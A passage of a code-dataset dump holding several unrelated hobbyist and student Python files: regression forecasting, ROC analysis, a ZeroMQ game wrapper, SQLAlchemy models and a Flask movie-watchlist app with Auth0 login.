회귀분석 및 그래프에 회귀식 추가\r\ny = sales\r\nx = t\r\nx = sm.add_constant(x)\r\nmodel = sm.OLS(y,x).fit()\r\nmodel.summary()\r\n#sales = 20.4 + 1.1 t\r\n\r\n# Forecast year 11 and year 12. 11년, 12년 세일예측\r\ntest_data = [11, 12]\r\nmodel.predict(sm.add_constant(test_data))\r\n\r\n# Create an error table and calculate ME, MAE, MAPE, and MSE. 에러 테이블을 이용하여 예측에러 측정치들을 계산\r\ny_pred = model.predict(x)\r\nerror = y - y_pred\r\nabs_error = np.abs(error)\r\npct_error = (abs_error / sales)*100\r\nsq_error = error**2\r\nme = round(error.mean(),2)\r\nmae = round(abs_error.mean(),2)\r\nmape = round(pct_error.mean(),2)\r\nmse = round(sq_error.mean(),2)\r\nprint(me, mae, mape, mse)\r\n\r\n# Create a tracking signal table and plot the signals. 추적신호 테이블을 만들고 추적신호 그래프\r\nsum_error = np.cumsum(error)\r\nsum_ae = np.cumsum(abs_error)\r\nmad = sum_ae / t\r\nts = sum_error / mad\r\nplt.plot(ts)\r\nplt.grid(axis='y', linestyle='--')\r\nplt.title('Tracking Signal')\r\nplt.show()\r\n\r\n# Import the revenue data. 콜레스테롤 수익 데이터를 가져오기\r\nrev = [23.1,21.3,27.4,34.6,33.8,43.2,59.5,64.4,74.2,99.3]\r\nt = np.arange(1,11)\r\ndf = pd.DataFrame({'t':t, 'rev':rev})\r\n\r\n# Plot the time series. 시계열 그래프 그리기\r\nplt.plot(df.t, df.rev, marker='o')\r\nplt.grid(axis='y', linestyle='--')\r\nplt.xlabel('Year')\r\nplt.ylabel('Revenue')\r\nplt.title('Choresterol Revenue')\r\nplt.show()\r\n\r\n# Conduct a regression analysis and plot the regression equation on the time series plot. 회귀분석 수행과 회귀식 추가\r\ndf['t_sq'] = df.t**2\r\ny = df.rev\r\nx = df.drop('rev', axis=1)\r\nx = sm.add_constant(x)\r\nmodel = sm.OLS(y,x).fit()\r\nmodel.summary()\r\n#revenue = 24.1817 - 2.1060 * t + 0.9216 * t^2\r\n\r\n# Forecast year 11 and year 12. 11년, 12년 예측\r\ntest_data = pd.DataFrame({'t': [11, 12],\r\n 't_sq':[11**2, 12**2]})\r\nmodel.predict(sm.add_constant(test_data))\r\n\r\n# Create an error table and calculate ME, MAE, MAPE, and MSE. 에러 테이블과 에러측정치 계산\r\ny_pred = model.predict(x)\r\nerror = y - y_pred\r\nabs_error = np.abs(error)\r\npct_error = (abs_error / sales)*100\r\nsq_error = error**2\r\ntable = pd.concat([error,abs_error, pct_error, sq_error], axis=1)\r\ntable.columns = ['Error', 'Abs Error', '% Error', 'Sq Error']\r\ntable\r\nme = round(error.mean(),2)\r\nmae = round(abs_error.mean(),2)\r\nmape = round(pct_error.mean(),2)\r\nmse = round(sq_error.mean(),2)\r\nprint(me, mae, mape, mse)\r\n\r\n# Create a tracking signal table and plot the signals. 추석신호 테이블과 그래프\r\nsum_error = np.cumsum(error)\r\nsum_ae = np.cumsum(abs_error)\r\nmad = sum_ae / t\r\nts = sum_error / mad\r\nplt.plot(ts)\r\nplt.grid(axis='y', linestyle='--')\r\nplt.title('Tracking Signal')\r\nplt.show()","repo_name":"denverkim/DATA_MINING","sub_path":"LAB8.py","file_name":"LAB8.py","file_ext":"py","file_size_in_byte":4928,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"20484819085","text":"import os, sys, glob\nimport argparse\n\ndef InitParser():\n parser = argparse.ArgumentParser(description='')\n parser.add_argument('--first', type=str, help='first day')\n parser.add_argument('--last', type=str, help='last day')\n parser.add_argument('--name', type=str, help='name of files without times')\n parser.add_argument('--source_dir', type=str, help='path to files directory')\n parser.add_argument('--timestep', type=float,default=0.2, help='timesteps in days')\n return parser\n\ndef GetLastDayOfFile(fileName):\n return fileName.split('_to_')[-1].split('days')[0]\n\ndef GetListOfFilesToConcat(timesDict, curr_first, last, timestep):\n if curr_first == last:\n return []\n\n if curr_first not in timesDict:\n print(curr_first, \" is not the first in any file\")\n return None\n\n for f in timesDict[curr_first]:\n print(f)\n l = GetListOfFilesToConcat(timesDict, str(float(GetLastDayOfFile(f)) + timestep), last, timestep)\n if l is not None:\n return [f] + l\n\n l = GetListOfFilesToConcat(timesDict, str(float(GetLastDayOfFile(f))), last, timestep)\n if l is not None:\n return [f] + l\n '''\n for step in range(0,20):\n l = GetListOfFilesToConcat(timesDict, str(float(GetLastDayOfFile(f)) + 0.1 * step), last, timestep)\n if l is not None:\n return [f] + l\n '''\n\n return None\n\ndef ConcateFiles(files):\n data = \"\"\n first = True\n for f in files:\n file = open(f,mode=\"r\")\n if not first:\n data += \", \"\n data += file.readline()\n first = False\n\n return data\n\nif __name__ == \"__main__\":\n parser = InitParser()\n args = parser.parse_args()\n files = glob.glob(args.source_dir + \"\\\\\" + args.name + \"*\")\n begintimeDict = dict()\n for f in files:\n beginTime = f.split('time_')[-1].split('_to')[0]\n if beginTime not in begintimeDict:\n begintimeDict[beginTime] = []\n begintimeDict[beginTime].append(f)\n\n filesToConcat = GetListOfFilesToConcat(begintimeDict, args.first, args.last, args.timestep)\n if filesToConcat is None:\n print(\"could not concat those files...\")\n else:\n newFile = open(args.source_dir + \"\\\\\" + args.name + \"time_\" + args.first + \"_to_\" + args.last, mode=\"w\")\n newFile.write(ConcateFiles(filesToConcat))\n newFile.close()\n print(\"new file has been saved to \", args.source_dir + \"\\\\\" + args.name + \"time_\" + args.first + \"_to_\" + args.last)","repo_name":"hilaglanz/TCE","sub_path":"ConcateFiles.py","file_name":"ConcateFiles.py","file_ext":"py","file_size_in_byte":2533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"1418150232","text":"#!/usr/bin/env python\n# _*_ coding: utf-8 _*_\n# Author:Shansong Huang\n# Date:2017-11-22\n# Calculate the AUC value and get ROC curve\nimport pandas\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn.metrics import roc_auc_score, roc_curve\n\ny_pred_path = 'y_pred_35.csv'\ny_true_path = 'y_true_35.csv'\n\n\n# get labels from each CSV file\n# label_path: each CSV files path\n# return: CSV's information\ndef get_label_array(label_path):\n dataframe = pandas.read_csv(label_path, header=None)\n dataset = dataframe.values\n label = np.array(dataset)\n return label\ny_true = get_label_array(y_true_path)\ny_pred = get_label_array(y_pred_path)\nfinal_num = y_pred.shape[0]\nnum = y_pred.shape[1]\nauc = []\nroc_fpr = []\nroc_tpr = []\nroc_thresholds = []\nfor i in range(num):\n auc.append(roc_auc_score(y_true[:final_num, i], y_pred[:final_num, i]))\n fpr, tpr, thresholds = roc_curve(\n y_true[:final_num, i], y_pred[:final_num, i])\n roc_fpr.append(fpr)\n roc_tpr.append(tpr)\n roc_thresholds.append(thresholds)\n# roc_fpr: 1-Specificity\n# roc_tpr: Sensitivity\n# youden_index = Sensitivity + Specificity -1\n# = roc_tpr - roc_fpr\ncut_poit = {}\nall_cut_point = {}\ndisease_name = (\n 'Atelectasis', 'Cardiomegaly', 'Effusion', 'Infiltration',\n 'Mass', 'Nodule', 'Pneumonia', 'Pneumothorax', 'Consolidation',\n 'Edema', 'Emphysema', 'Fibrosis', 'Pleural_Thickening', 'Hernia')\ndict_thresholds_x = {}\ndict_thresholds_y = {}\nall_dict_thresholds_x = {}\nall_dict_thresholds_y = {}\nfor n in range(14):\n for i in range(len(roc_fpr[n])):\n youden_index = roc_tpr[n][i] - roc_fpr[n][i]\n cut_poit[youden_index] = roc_thresholds[n][i]\n dict_thresholds_x[youden_index] = roc_fpr[n][i]\n dict_thresholds_y[youden_index] = roc_tpr[n][i]\n Max = max(cut_poit.keys())\n all_cut_point[disease_name[n]] = cut_poit[Max]\n all_dict_thresholds_x[disease_name[n]] = dict_thresholds_x[Max]\n all_dict_thresholds_y[disease_name[n]] = dict_thresholds_y[Max]\n cut_poit = {}\n dict_thresholds_x = {}\n dict_thresholds_y = {}\n# print('Value of Youden index:', Max)\nprint('Num of test:', final_num)\nprint('10520 : with hernia*3 and without normal')\nprint('22600 : with hernia*3 and with normal')\nprint('10340 : with hernia and without normal')\nprint('22420 : with hernia and with normal')\n\nprint('Value of AUC:')\nfor o, a in zip(disease_name, auc):\n print(o, a)\nprint('--------------------')\nprint('Value of all cut point:')\nfor key, value in sorted(all_cut_point.items()):\n print(key, value)\npandas.DataFrame(auc).to_csv(\n 'AUC.csv', header=None, index=None)\noutfile = open('dict.txt', 'w')\nfor key, value in sorted(all_cut_point.items()):\n outfile.write(str(key) + ':' + str(value) + '\\n')\nplt.rcParams['savefig.dpi'] = 600\n\nplt.figure(0)\nplt.plot([0, 1], [0, 1], 'k--')\nfor i in range(num):\n plt.plot(roc_fpr[i], roc_tpr[i], label=disease_name[i])\nplt.xlabel('False positive rate')\nplt.ylabel('True positive rate')\nplt.title('ROC curve')\nplt.legend(loc='best')\nplt.savefig('roc.png')\nplt.show()\n\nfor i in range(num):\n plt.figure(num+1)\n plt.plot([0, 1], [0, 1], 'k--')\n plt.plot(roc_fpr[i], roc_tpr[i])\n label = str('True Positive Rate: ' + str(\n all_dict_thresholds_y[disease_name[i]]) + '\\n' +\n 'False Positice Rate: ' + str(all_dict_thresholds_x[disease_name[i]])\n + '\\n' + 'Cut point: ' + str(all_cut_point[disease_name[i]]))\n plt.scatter(\n all_dict_thresholds_x[disease_name[i]],\n all_dict_thresholds_y[disease_name[i]],\n c='r', marker='o', label=label)\n plt.xlabel('False positive rate')\n plt.ylabel('True positive rate')\n plt.title(disease_name[i])\n plt.legend(loc='best')\n plt.savefig(str(i+1) + '.png')\n plt.clf()\n","repo_name":"sasonhuang/Digital-Radiography","sub_path":"DR_Densenet169/AUC.py","file_name":"AUC.py","file_ext":"py","file_size_in_byte":3766,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"43"} +{"seq_id":"41849805180","text":"import zmq\nimport numpy as np\nimport re\nfrom distutils.util import strtobool\n\ntry:\n import signal\nexcept ImportError as ie:\n ie.args += (\"No signal module found. Assuming SIGPIPE is okay.\", )\n raise\n\ncontext = None\nsocket = None\n\n\nclass GameEnv:\n def __init__(self, zmq_port, mode, thread_num):\n global context\n global socket\n\n context = zmq.Context()\n self.socket = context.socket(zmq.REQ)\n self.socket.connect(\"tcp://127.0.0.1:%s\" % zmq_port)\n\n if mode == \"Shooter\":\n self.actions = [0, 1, 2, 3, 4, 5, 999] # shooter\n # actions for selecting each entity or stopping\n # Action 5 - ignore all entities\n # Action 999 - take all entities\n else:\n self.actions = [0, 1, 2, 3, 4, 999] # EMA\n\n def process_msg(self, msg):\n tmp = re.split(' ', msg)\n state = tmp[0]\n reward = tmp[1]\n terminal = tmp[2]\n return np.array(state.split(', '),\n float), float(reward), strtobool(terminal)\n\n def newGame(self):\n self.socket.send(\"newGame\")\n msg = self.socket.recv()\n while msg == None:\n msg = self.socket.recv()\n return self.process_msg(msg)\n\n def newGameEval(self):\n self.socket.send(\"newGameEval\")\n msg = self.socket.recv()\n while msg == None:\n msg = self.socket.recv()\n return self.process_msg(msg)\n\n def step(self, action, query):\n self.socket.send(str(action) + \" \" + str(query))\n msg = self.socket.recv()\n while msg == None:\n msg = self.socket.recv()\n return self.process_msg(msg)\n\n def evalInit(self):\n self.socket.send(\"evalInit\")\n msg = self.socket.recv()\n try:\n assert (msg == 'done')\n except AssertionError as e:\n e.args += (msg, )\n raise\n\n def evalStart(self):\n self.socket.send(\"evalStart\")\n msg = self.socket.recv()\n try:\n assert (msg == 'done')\n except AssertionError as e:\n e.args += (msg, )\n raise\n\n def evalEnd(self):\n self.socket.send(\"evalEnd\")\n msg = self.socket.recv()\n try:\n assert (msg == 'done')\n except AssertionError as e:\n e.args += (msg, )\n raise\n\n def getActions(self):\n return self.actions\n","repo_name":"adi-sharma/RLIE_A3C","sub_path":"code/a3c/game_env.py","file_name":"game_env.py","file_ext":"py","file_size_in_byte":2415,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"43"} +{"seq_id":"9374371183","text":"import json\n# import random\n# #import matplotlib.colors;\n\n# def randomChooser(colors):\n# colorsCopy = colors.copy();\n# text = colorsCopy.pop(0); #second\n# background = colorsCopy.pop(0); #first\n# return [background, text];\n\n# with open ('./country-colors-true.json', 'r', encoding=\"utf-8\") as f:\n# data = json.load(f)\n\n# newDict = {}\n# for i in data:\n# newDict[i] = randomChooser(data[i])\n\n\n\n# with open (\"./country-colors-true-single.json\", 'w') as f:\n# json.dump(newDict, f, indent=4)\n\t\n\n\n\nwith open (\"./country-colors-true-single.json\", \"r\", encoding=\"utf-8\") as f:\n\tdata = json.load(f)\n\n# with open (\"./country-flag-true.json\", \"r\") as f:\n# \tdataFlag = json.load(f)\n\n\nwith open (\"../countryCards.css\", \"w\") as f:\n\tf.write(\"\")\n\n\nwith open (\"../countryCards.css\", \"a\") as f:\n\tfor i in data:\n\t\tunchanged = i\n\t\ti = i.replace(\"(\", \"\")\n\t\ti = i.replace(\")\", \"\")\n\t\ti = i.replace(\" \", \"\")\n\t\ti = i.replace(\"'\", \"\")\n\t\ti = i.replace(\".\", \"\")\n\t\ti = i.replace(\",\", \"\")\n\t\tif \"Ivoire\" in i:\n\t\t\tprint(i)\n\t\t#print(i + \"\\n\")\n\t\tf.write(f\"\"\".{i}-country {{\n\tbackground-color: {data[unchanged][0]};\n}}\n.{i}-text {{\n\tcolor:{data[unchanged][1]};\n}}\n\n.{i}-country:hover {{\n\tbackground-color: {data[unchanged][1]};\n\ttransition: 0.3s;\n}}\n.{i}-country:hover .{i}-text {{\n\tcolor:{data[unchanged][0]};\n\ttransition: 0.3s;\n}}\n\n\"\"\")\n\t\t","repo_name":"naowalrahman/ecoventures-ui","sub_path":"src/pages/locations/editor.py","file_name":"editor.py","file_ext":"py","file_size_in_byte":1335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"15834944302","text":"# coding: utf-8\nfrom sqlalchemy import Column, Date, DateTime, ForeignKey, text\nfrom sqlalchemy.dialects.mysql import INTEGER, TINYTEXT\nfrom sqlalchemy.orm import relationship\nfrom sqlalchemy.ext.declarative import declarative_base\n\nBase = declarative_base()\nmetadata = Base.metadata\n\n\nclass Ataques(Base):\n __tablename__ = 'ataques'\n\n id_ataque = Column(INTEGER(11), primary_key=True)\n nombre_ataque = Column(TINYTEXT)\n arma = Column(TINYTEXT, nullable=False)\n\n\nclass Cazadores(Base):\n __tablename__ = 'cazadores'\n\n id_cazador = Column(INTEGER(11), primary_key=True)\n nombre = Column(TINYTEXT)\n birthday = Column(Date)\n rango = Column(TINYTEXT)\n pais_origen = Column(TINYTEXT, nullable=False)\n\n\nclass Demonios(Base):\n __tablename__ = 'demonios'\n\n id_demonio = Column(INTEGER(11), primary_key=True)\n nombre = Column(TINYTEXT, nullable=False)\n rango = Column(TINYTEXT, nullable=False)\n\n\nclass Enfrentamientos(Base):\n __tablename__ = 'enfrentamientos'\n\n id_enfrentamiento = Column(INTEGER(11), primary_key=True)\n fecha = Column(DateTime)\n\n\nclass CazadoresAtaques(Base):\n __tablename__ = 'cazadores_ataques'\n\n id_cazador_ataque = Column(INTEGER(11), primary_key=True)\n id_ataque = Column(ForeignKey('ataques.id_ataque'), index=True)\n id_cazador = Column(ForeignKey('cazadores.id_cazador'), index=True)\n desde = Column(DateTime, server_default=text(\"current_timestamp()\"))\n\n ataques = relationship('Ataques')\n cazadores = relationship('Cazadores')\n\n\nclass DetalleEnfrentamientos(Base):\n __tablename__ = 'detalle_enfrentamientos'\n\n id_detalle_enfrentamiento = Column(INTEGER(11), primary_key=True)\n id_cazador = Column(ForeignKey('cazadores.id_cazador'), index=True)\n id_demonio = Column(ForeignKey('demonios.id_demonio'), index=True)\n id_enfrentamiento = Column(ForeignKey('enfrentamientos.id_enfrentamiento'), index=True)\n estado_cazador = Column(TINYTEXT)\n estado_demonio = Column(TINYTEXT)\n\n cazadores = relationship('Cazadores')\n demonios = relationship('Demonios')\n enfrentamientos = relationship('Enfrentamientos')\n","repo_name":"fvildoso/sqlalchemy-kimetsunoyaiba","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2119,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"38361448153","text":"def contaPares(lista): #funcao lista\n pares = 0\n impares = 0 #comeca com 0\n for num in lista:\n if (num % 2) == 0: #numeros pares\n pares = pares + 1\n else:\n impares = impares + 1 #numeros impares\n return pares, impares\n\nlista = list() \n\nq = int(input('Quantos valores haverá na lista ? '))\nwhile q < 0:\n print('Erro')\n q = int(input('Quantos valores haverá na lista ? '))\n\nfor c in range(q):\n num = int(input('Valor:'))\n lista.append(num)\n\nprint('A quantidade de valores pares e impares são, respectivamente:',contaPares(lista))","repo_name":"Arthurssyllos/exercicio_lista","sub_path":"exe01.py","file_name":"exe01.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"72398523329","text":"from ctypes import cast\nfrom distutils.file_util import move_file\nfrom flask import Flask, redirect, render_template, request, session, url_for, current_app, jsonify, abort\nimport db\nimport tmdb\nimport os\nimport recommend\nimport general\nfrom os import dup, environ as env\nimport requests\n\n\n#auth imports\nfrom functools import wraps\nimport json\nfrom werkzeug.exceptions import HTTPException\nfrom authlib.integrations.flask_client import OAuth\nfrom six.moves.urllib.parse import urlencode\n\napp = Flask(__name__)\n\n\n#Set api\napi_url=os.environ['API_KEYWORD_QUERY_URL']\n\napi_key = os.environ['API_KEY']\n\n\n\n\n@app.before_first_request\ndef initialize():\n db.setup()\n app.register_error_handler(404, page_not_found)\n app.register_error_handler(405, method_not_allowed)\n\n# set app secret key\napp.secret_key = \"i dunnodliufawefnluiFS\"\n\n\n\n# TODO: enable and configure properly once auth0 is setup\noauth = OAuth(app)\n\nAUTH0_CLIENT_ID = env['auth0_client_id']\nAUTH0_CLIENT_SECRET = env['auth0_client_secret']\nAUTH0_DOMAIN = env['auth0_domain']\n\n# baseUrl = 'https://infinite-inlet-24245.herokuapp.com'\n\nauth0 = oauth.register(\n 'auth0',\n client_id=AUTH0_CLIENT_ID,\n client_secret=AUTH0_CLIENT_SECRET,\n api_base_url='https://' + AUTH0_DOMAIN,\n access_token_url='https://' + AUTH0_DOMAIN + '/oauth/token',\n authorize_url='https://' + AUTH0_DOMAIN + '/authorize',\n client_kwargs={\n 'scope': 'openid profile email',\n },\n)\n\n###AUTH STUFF\n\n@app.route('/callback')\ndef callback_handling():\n # Handles response from token endpoint\n auth0.authorize_access_token()\n resp = auth0.get('userinfo')\n userinfo = resp.json()\n\n # Store the user information in flask session.\n session['jwt_payload'] = userinfo\n session['profile'] = {\n 'user_id': userinfo['sub'],\n 'name': userinfo['name'],\n 'picture': userinfo['picture'],\n 'email': userinfo['email']\n }\n db.add_new_user(userinfo['sub'], userinfo['name'], \"\", False, userinfo['picture'])\n\n if 'return_url' in session.keys():\n return redirect(session['return_url'])\n return redirect(url_for('home'))\n\n\n@app.route('/login')\ndef login():\n # return auth0.authorize_redirect(redirect_uri=\"http://127.0.0.1:5000/callback\")\n return auth0.authorize_redirect(redirect_uri=url_for('callback_handling', _external=True))\n\n@app.route('/logout')\ndef logout():\n # Clear session stored data\n session.clear()\n # Redirect user to logout endpoint\n params = {'returnTo': url_for('start_page', _external=True), 'client_id': AUTH0_CLIENT_ID}\n return redirect(auth0.api_base_url + '/v2/logout?' + urlencode(params))\n\ndef requires_auth(f):\n @wraps(f)\n def decorated(*args, **kwargs):\n if 'profile' not in session:\n # Redirect to Login page here\n return redirect('/login')\n return f(*args, **kwargs)\n\n return decorated\n\n\n# *** replaces isLoggedIn = 'profile' in session ***\n# args are positional arguments and kwargs are keyword arguments (dictionary)\n# isLoggedIn in kwargs gets passed to the isLoggedIn specified in the parameter list of the wrapped function\ndef logged_in(f):\n @wraps(f)\n def decorated(*args, **kwargs):\n \n kwargs['loggedInInfo'] = {}\n\n if 'profile' not in session:\n kwargs['loggedInInfo']['isLoggedIn'] = False\n kwargs['loggedInInfo']['profilePicture'] = None\n kwargs['loggedInInfo']['username'] = None\n kwargs['loggedInInfo']['email'] = None\n # current_app.logger.info(kwargs['isLoggedIn'])\n else:\n kwargs['loggedInInfo']['isLoggedIn'] = True\n kwargs['loggedInInfo']['profilePicture'] = session['profile']['picture']\n kwargs['loggedInInfo']['username'] = session['profile']['name']\n kwargs['loggedInInfo']['email'] = session['profile']['email']\n # kwargs['curUserId'] = session['profile']['user_id']\n # current_app.logger.info(kwargs['isLoggedIn'])\n return f(*args, **kwargs)\n return decorated\n\n\n# PAGES\n\n\n@app.route('/', methods=['GET'])\ndef start_page():\n return redirect(url_for('welcome'))\n\n@app.route('/welcome')\n@logged_in\ndef welcome(loggedInInfo):\n # current_app.logger.info(isLoggedIn)\n return render_template('welcome.html', \\\n isLoggedIn=loggedInInfo['isLoggedIn'], profilePicture=loggedInInfo['profilePicture'], email=loggedInInfo['email'])\n\n@app.route('/home', methods=['GET'])\n@logged_in\ndef home(loggedInInfo):\n most_popular_2d = db.get_most_popular_media()\n # [['323660', '99861'], ['9320', '99861', '2473', '299536'], ['24428', '299534']\n watched_info=[]\n watching_info=[]\n will_watch_info=[]\n for i in range(len(most_popular_2d[0])):\n info={}\n\n media = db.get_media_by_id(most_popular_2d[0][i])\n info[\"title\"] = media[0][\"media_title\"]\n info[\"poster\"] = media[0][\"media_poster_path\"]\n info[\"link\"] = '/mediaInfo/' + media[0][\"media_type\"] + '/' + most_popular_2d[0][i]\n\n watched_info.append(info) \n\n for i in range(len(most_popular_2d[1])):\n info={}\n media = db.get_media_by_id(most_popular_2d[1][i])\n info[\"title\"] = media[0][\"media_title\"]\n info[\"poster\"] = media[0][\"media_poster_path\"]\n info[\"link\"] = '/mediaInfo/' + media[0][\"media_type\"] + '/' + most_popular_2d[1][i]\n \n watching_info.append(info)\n\n for i in range(len(most_popular_2d[2])):\n info={}\n media = db.get_media_by_id(most_popular_2d[2][i])\n info[\"title\"] = media[0][\"media_title\"]\n info[\"poster\"] = media[0][\"media_poster_path\"]\n info[\"link\"] = '/mediaInfo/' + media[0][\"media_type\"] + '/' + most_popular_2d[2][i]\n\n will_watch_info.append(info)\n return render_template('homepage.html', watched_info=watched_info, watching_info=watching_info, will_watch_info=will_watch_info, \\\n isLoggedIn=loggedInInfo['isLoggedIn'], profilePicture=loggedInInfo['profilePicture'], email=loggedInInfo['email'])\n\n\n@app.route('/community', methods=['GET'])\n@logged_in\ndef community(loggedInInfo):\n is_watched = True \n is_watching = True \n is_will_watch = True\n if(loggedInInfo['isLoggedIn'] == True):\n user_id = str(session['profile']['user_id'])\n watched_score, watching_score, will_watch_score = recommend.get_score_list(user_id)\n watched_users = recommend.get_user_info(watched_score)\n if(len(watched_users) == 0):\n watched_users = recommend.get_top5_watched_users()\n is_watched = False\n watching_users = recommend.get_user_info(watching_score)\n if(len(watching_users) == 0):\n watching_users = recommend.get_top5_watching_users()\n is_watching = False\n will_watch_users = recommend.get_user_info(will_watch_score)\n if(len(will_watch_users) == 0):\n will_watch_users = recommend.get_top5_will_watch_users()\n is_will_watch = False\n for dic in will_watch_users:\n if dic['info']['user_id'] == user_id:\n will_watch_users.remove(dic)\n for dic in watching_users:\n if dic['info']['user_id'] == user_id:\n watching_users.remove(dic)\n for dic in watched_users:\n if dic['info']['user_id'] == user_id:\n watched_users.remove(dic)\n else:\n is_watched = False\n is_watching = False\n is_will_watch = False\n watched_users, watching_users, will_watch_users = recommend.get_top5_users()\n return render_template('community.html', \\\n isLoggedIn=loggedInInfo['isLoggedIn'], profilePicture=loggedInInfo['profilePicture'], email=loggedInInfo['email'], \n watched_users = watched_users, watching_users = watching_users, will_watch_users = will_watch_users,\n is_watched = is_watched, is_watching = is_watching, is_will_watch = is_will_watch)\n\n\n@app.route('/search', methods=['GET'])\n@logged_in\ndef search(loggedInInfo):\n session['return_url'] = request.url\n current_app.logger.info(session['return_url'])\n search_type = request.args[\"search_options\"]\n search_query = request.args[\"search_query\"]\n if search_type == \"media\" :\n api_query = api_url +search_query\n response = (requests.request(\"GET\", api_query)).json()\n res_ids = [str(media['id']) for media in response['results']]\n if (loggedInInfo['isLoggedIn']):\n addedLists = db.is_media_list_in_user(res_ids, session['profile']['user_id'])\n else:\n addedLists = db.is_media_list_in_user(res_ids, \"-1\")\n current_app.logger.info(addedLists)\n return render_template('search.html', searchQuery= search_query, motionPictures = response[\"results\"], \\\n isLoggedIn=loggedInInfo['isLoggedIn'], profilePicture=loggedInInfo['profilePicture'], email=loggedInInfo['email'],\n addedLists = addedLists)\n else:\n \n pattern_match_search = '%'+ search_query + '%'\n if (loggedInInfo['isLoggedIn']):\n users = db.get_user(pattern_match_search, session['profile']['user_id'], True)\n followees = db.get_followee_ids_by_user_id(session['profile']['user_id'])\n for user in users:\n if (user['user_id'] in followees):\n user['is_followed'] = True\n else:\n user['is_followed'] = False\n else:\n users = db.get_user(pattern_match_search, None, False)\n\n return render_template('userSearch.html', searchQuery= search_query, users=users, \\\n isLoggedIn=loggedInInfo['isLoggedIn'], profilePicture=loggedInInfo['profilePicture'], email=loggedInInfo['email'])\n\n\n# Check if media is in db then add to specified list\n@app.route('/addToList', methods=['POST'])\n@requires_auth\ndef addToList():\n media_id = request.form['mediaID']\n media_type = request.form['media_type']\n media_title = request.form['media_title']\n media_poster_path = request.form['media_poster']\n\n if(db.is_media_in_db(media_id) == False):\n db.add_new_media(media_id, media_type,media_title,media_poster_path)\n \n # Check if media is already in a watchlist\n dupe_add = db.is_media_in_user(media_id, session['profile']['user_id'])\n current_app.logger.info(dupe_add)\n if(dupe_add[0]):\n db.update_list_db(session['profile']['user_id'], media_id, dupe_add[1], request.form['listType'])\n return redirect(session['return_url'])\n\n if request.form['listType'] == \"watching\":\n db.add_item_to_watching(session['profile']['user_id'], media_id)\n elif request.form['listType'] == \"watched\":\n db.add_item_to_watched(session['profile']['user_id'], media_id)\n else: # 'will_watch'\n db.add_item_to_will_watch(session['profile']['user_id'], media_id)\n return redirect(session['return_url'])\n\n\n@app.route('/profile', methods=['GET'])\n@logged_in\n@requires_auth\ndef profile(loggedInInfo):\n watched = db.get_user_media_for_list(str(session['profile']['user_id']), \"watched\")\n watched_info = []\n for i in range(len(watched)):\n info = {}\n \n media = db.get_media_by_id(watched[i])\n info['id'] = watched[i]\n info[\"title\"] = media[0][\"media_title\"]\n info[\"poster\"] = media[0][\"media_poster_path\"]\n info[\"link\"] = '/mediaInfo/' + media[0][\"media_type\"] + '/' + watched[i]\n\n watched_info.append(info)\n\n watching = db.get_user_media_for_list(str(session['profile']['user_id']), \"watching\")\n watching_info = []\n for i in range(len(watching)):\n info = {}\n\n media = db.get_media_by_id(watching[i])\n info['id'] = watching[i]\n info[\"title\"] = media[0][\"media_title\"]\n info[\"poster\"] = media[0][\"media_poster_path\"]\n info[\"link\"] = '/mediaInfo/' + media[0][\"media_type\"] + '/' + watching[i]\n\n watching_info.append(info)\n \n will_watch = db.get_user_media_for_list(str(session['profile']['user_id']), \"will_watch\")\n will_watch_info = []\n for i in range(len(will_watch)):\n info = {}\n\n media = db.get_media_by_id(will_watch[i])\n info['id'] = will_watch[i]\n info[\"title\"] = media[0][\"media_title\"]\n info[\"poster\"] = media[0][\"media_poster_path\"]\n info[\"link\"] = '/mediaInfo/' + media[0][\"media_type\"] + '/' + will_watch[i]\n\n will_watch_info.append(info)\n\n user_profile = db.get_user_by_id(str(session['profile']['user_id']))\n\n return render_template('profile.html', watched_info=watched_info, watching_info=watching_info, will_watch_info=will_watch_info, \\\n isLoggedIn=loggedInInfo['isLoggedIn'], profilePicture=loggedInInfo['profilePicture'], email=loggedInInfo['email'], user_profile = user_profile)\n\n@app.route('/mediaInfo//', methods=['GET'])\n@logged_in\ndef mediaInfo(media_type, media_id, loggedInInfo):\n session['return_url'] = request.url\n mediaData = None\n if (media_type == \"movie\"):\n mediaData = tmdb.query_by_movie_id(media_id)\n elif (media_type == \"tv\"):\n mediaData = tmdb.query_by_tv_id(media_id)\n \n if (mediaData == None):\n abort(404, description=\"Media ID: \" + media_id + \",Media Type:\" + media_type + \" not found\")\n mediaData.update({\"media_type\": media_type})\n\n if (media_type == \"movie\"):\n castData = tmdb.query_cast_info_by_movie_id(media_id, 6)\n elif (media_type == \"tv\"):\n castData = tmdb.query_cast_info_by_tv_id(media_id, 6)\n \n watchlistCounts = db.get_watchlist_count_by_media_id(media_id)\n\n \n # Show related users, check if media is already in one of user's watchlists\n if (loggedInInfo['isLoggedIn']):\n users_id = db.get_users_by_media(media_id, session['profile']['user_id'], True)\n added = db.is_media_in_user(media_id, session['profile']['user_id'])\n if (added[0]):\n if (added[1] == 'will_watch'):\n addedList = \"Want to Watch\"\n elif (added[1] == 'watching'):\n addedList = \"Watching\"\n elif (added[1] == 'watched'):\n addedList = \"Watched\"\n else:\n addedList = 'null'\n else:\n users_id = db.get_users_by_media(media_id, None, False)\n addedList = 'null'\n \n watched_users = []\n for user in users_id[:4]:\n # if (user[\"user_id\"] == session['profile']['user_id']):\n # continue\n user_info={}\n result = db.get_user_by_id(user[\"user_id\"])\n user_info[\"info\"] = result[0]\n user_info[\"link\"] = '/user/' + result[0][\"user_id\"]\n watched_users.append(user_info)\n current_app.logger.info(result)\n\n return render_template('mediaInfo.html', mediaData = mediaData, castData = castData, watchlistCounts = watchlistCounts, \\\n isLoggedIn=loggedInInfo['isLoggedIn'], profilePicture=loggedInInfo['profilePicture'], email=loggedInInfo['email'], watched_users = watched_users,\n addedList = addedList)\n\n@app.errorhandler(404)\n@logged_in\ndef 